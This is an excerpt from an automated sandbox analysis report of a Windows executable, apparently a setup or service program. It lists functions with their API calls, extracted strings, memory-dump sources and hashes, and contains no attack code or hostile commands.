                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                                                    • String ID: Error allocating memory while converting Native string to UTF8 string$Failed to convert WideCharToMultiByte. ErrorCode::%d$OOBEUtils$StringUtils
                                                                                                                                                                                                                                                                    • API String ID: 203985260-2236274340
                                                                                                                                                                                                                                                                    • Opcode ID: e39f2a51ba932da9826a003946e3c0e9b08f0d17437669bc90833129a53970bc
                                                                                                                                                                                                                                                                    • Instruction ID: 716146f1c0389004c4db2de1f4adde63d4e0a6c81021537d3ce57664b142a41d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e39f2a51ba932da9826a003946e3c0e9b08f0d17437669bc90833129a53970bc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28417B3578031477DA20AF1AAC47FEA7794EB42B21F2400BBFD09632D0D9696D4487AD
                                                                                                                                                                                                                                                                    Function 00403C90 Relevance: 13.6, APIs: 2, Strings: 7, Instructions: 137sleepCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • Success:Initializing Connection Channel with Service with pipename: %s, xrefs: 00403D73
                                                                                                                                                                                                                                                                    • Communication is open on the other pipe. Closing the static guid and re-opening for new clients..., xrefs: 00403DF4
                                                                                                                                                                                                                                                                    • Successfully initiated communication, xrefs: 00403DAA
                                                                                                                                                                                                                                                                    • Initializing1 Connection Channel with Service with pipename: %s, xrefs: 00403CD0
                                                                                                                                                                                                                                                                    • Failed to create the connection channel, xrefs: 00403D34
                                                                                                                                                                                                                                                                    • Failed to initiate communication, xrefs: 00403DCB
                                                                                                                                                                                                                                                                    • Problem initializing Connection Channel. Quitting., xrefs: 00403D11
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                                                                                    • String ID: Communication is open on the other pipe. Closing the static guid and re-opening for new clients...$Failed to create the connection channel$Failed to initiate communication$Initializing1 Connection Channel with Service with pipename: %s$Problem initializing Connection Channel. Quitting.$Success:Initializing Connection Channel with Service with pipename: %s$Successfully initiated communication
                                                                                                                                                                                                                                                                    • API String ID: 3472027048-2173017273
                                                                                                                                                                                                                                                                    • Opcode ID: 6df400194c0d2eafb8ad463674300954c48552a7f74c4dd405dff45e14274271
                                                                                                                                                                                                                                                                    • Instruction ID: 5187b662ea0dd10bef7ca44164715a625855074a8d72d76878ed54e6067e5788
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6df400194c0d2eafb8ad463674300954c48552a7f74c4dd405dff45e14274271
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9141F170600200EFCB10DF19DC89B5A7BA8AF49705F1440BAE909BB3D1CB78ED44CBA9
                                                                                                                                                                                                                                                                    Function 00418B10 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 330COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00418B88
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00418BAF
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00418C74
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00418C8E
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00418D23
                                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00418D30
                                                                                                                                                                                                                                                                      • Part of subcall function 0046877A: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00468786
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$LockitLockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegisterstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                                    • API String ID: 1871079455-1405518554
                                                                                                                                                                                                                                                                    • Opcode ID: c6cdc14bd338eddc53a98ba7adfe9d068b301496e6a84cf03d0ab39cc8f10731
                                                                                                                                                                                                                                                                    • Instruction ID: 2b18787ee60dced21a1ee80d710d234eacb2e1acb53e15705c8ae09ecf607236
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6cdc14bd338eddc53a98ba7adfe9d068b301496e6a84cf03d0ab39cc8f10731
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBD16FB1E002189FDB00DFA5C984BDEBBB5BF58314F14406EE805A7391EB78AD45CB99
                                                                                                                                                                                                                                                                    Function 0270E841 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 0270E960
                                                                                                                                                                                                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 0270EA6E
                                                                                                                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 0270EBC0
                                                                                                                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 0270EBDB
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000003.2675735037.00000000026E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 026E0000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_3_26e0000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                    • API String ID: 2751267872-393685449
                                                                                                                                                                                                                                                                    • Opcode ID: 0275174e13d2e9d91b3a12f051e8f4617d943602b80e7701a0e69409b5061bbe
                                                                                                                                                                                                                                                                    • Instruction ID: 72deadeedc62644f95ff928cd87f5ad674e842da7ddea842ef949fbba30705e6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0275174e13d2e9d91b3a12f051e8f4617d943602b80e7701a0e69409b5061bbe
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85B13771C00209DFCF25DFA4C884AAEBBF6FF08314B14499AE8156B291D771DA59CF92
                                                                                                                                                                                                                                                                    Function 004013E0 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 295COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004013E5
                                                                                                                                                                                                                                                                      • Part of subcall function 0046873A: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00468746
                                                                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00401519
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • ServiceWorkerThread: Workflow Start Failed, xrefs: 004016D6
                                                                                                                                                                                                                                                                    • string too long, xrefs: 004013E0
                                                                                                                                                                                                                                                                    • ServiceWorkerThread: Workflow Started, xrefs: 0040168F
                                                                                                                                                                                                                                                                    • ServiceWorkerThread: Returning from the worker thread, xrefs: 0040173D
                                                                                                                                                                                                                                                                    • ServiceWorkerThread: Started, xrefs: 004015A6
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                    • String ID: ServiceWorkerThread: Started$ ServiceWorkerThread: Workflow Start Failed$ ServiceWorkerThread: Workflow Started$ServiceWorkerThread: Returning from the worker thread$string too long
                                                                                                                                                                                                                                                                    • API String ID: 3990507346-493984609
                                                                                                                                                                                                                                                                    • Opcode ID: d82a602f60015f722318a5e5598d58ea829feccefa44ef9ae6b957b033f1123a
                                                                                                                                                                                                                                                                    • Instruction ID: 0de4d92833269bd46795cda1e8f9f860099c4cf613756acb1c3ca96f5a9e6a69
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d82a602f60015f722318a5e5598d58ea829feccefa44ef9ae6b957b033f1123a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0A13BB1A002059BE710DF69DC42B6EB7A4EF40314F24427FE815E73D1EB78994487DA
                                                                                                                                                                                                                                                                    Function 00401DB0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 145COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: NULL OOBE_Event_t object passed in SetEvnt $OOBEEvents$OOBEUtils$Receiveded SERVICE_CONTROL_STOP signal$ServiceCtrlHandler: Finished$ServiceCtrlHandler: Started
                                                                                                                                                                                                                                                                    • API String ID: 0-3825141419
                                                                                                                                                                                                                                                                    • Opcode ID: 6ca62fb21f9d5d796d1c64262897b507ae4cdca6753128363298717e489f106b
                                                                                                                                                                                                                                                                    • Instruction ID: 66e086e936243a972247da67edb77e0195688db155f0063ebd03624c2dfed7a4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ca62fb21f9d5d796d1c64262897b507ae4cdca6753128363298717e489f106b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D51C270A81215ABEB10DB15DD46B5E3BA4EB00B18F14017BF905B73D1EF78A9048BEE
                                                                                                                                                                                                                                                                    Function 004165A0 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 154COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,?,00000000,00000000,?,00404FB7,00000000,00000000,004B0CCA,00000000), ref: 004165BA
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 00416661
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00416678
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                    • String ID: Error allocating memory while converting UTF8 string to Native string$Failed to convert MultiByteToWideChar. ErrorCode::%d$OOBEUtils$StringUtils
                                                                                                                                                                                                                                                                    • API String ID: 1717984340-475419079
                                                                                                                                                                                                                                                                    • Opcode ID: 2ac2b592db3f9692cb7a5b3bc46003a3bf626419324c79dd5455d25ea0bdc311
                                                                                                                                                                                                                                                                    • Instruction ID: 607fb1377a63fdc9f035f0c432f6c8044d68b344f7ff51ac538f5213003713f8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ac2b592db3f9692cb7a5b3bc46003a3bf626419324c79dd5455d25ea0bdc311
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0418D35781214A7C620AF6AAC47FEB7358EB81B25F1401BBFD09A32D0DD69AD0046ED
                                                                                                                                                                                                                                                                    Function 00412610 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 169COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004126EE
                                                                                                                                                                                                                                                                    • __Getctype.LIBCPMT ref: 00412707
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00412751
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004127EF
                                                                                                                                                                                                                                                                    • __Getwctype.LIBCPMT ref: 0041282A
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$Locinfo::_$GetctypeGetwctypeLocinfo_ctorLocinfo_dtorLockitLockit::~_
                                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                                    • API String ID: 201867346-1405518554
                                                                                                                                                                                                                                                                    • Opcode ID: 1af70972fbd8fd394261b7672b218bb29ee07418f61f38ba363869a3bb34d789
                                                                                                                                                                                                                                                                    • Instruction ID: fb01a51910be7c6eaa99b540ff2eac30bca8d6a60054ec657d3f721683236568
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1af70972fbd8fd394261b7672b218bb29ee07418f61f38ba363869a3bb34d789
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 525193B1C003589BEB10DFA5C945BDAB7B4BF14314F14826ED848E7341EB78EA94CB66
                                                                                                                                                                                                                                                                    Function 0270D940 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 0270D977
                                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0270D97F
                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 0270DA08
                                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0270DA33
                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 0270DA88
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000003.2675735037.00000000026E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 026E0000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_3_26e0000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                    • Opcode ID: 894e7069a3bb6f9b8afff5041ee8ce0e025d7d72bd3e0c4b75bd4b3fd437d9f4
                                                                                                                                                                                                                                                                    • Instruction ID: 42e6c2e14da8e91730bd294b7d9e638192c40280eb952d19dde3eb4f8a56431d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 894e7069a3bb6f9b8afff5041ee8ce0e025d7d72bd3e0c4b75bd4b3fd437d9f4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D41AE74A00318DBCF21DFA9C884A9EBBE1EF05318F148195E819AB391D771A919CF91
                                                                                                                                                                                                                                                                    Function 0041FA30 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77synchronizationCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000008,000000FF,00000000,00000008,00405984,?,?,?,?,?,?,?,?,?,00000028), ref: 0041FB10
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,00000028), ref: 0041FB19
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
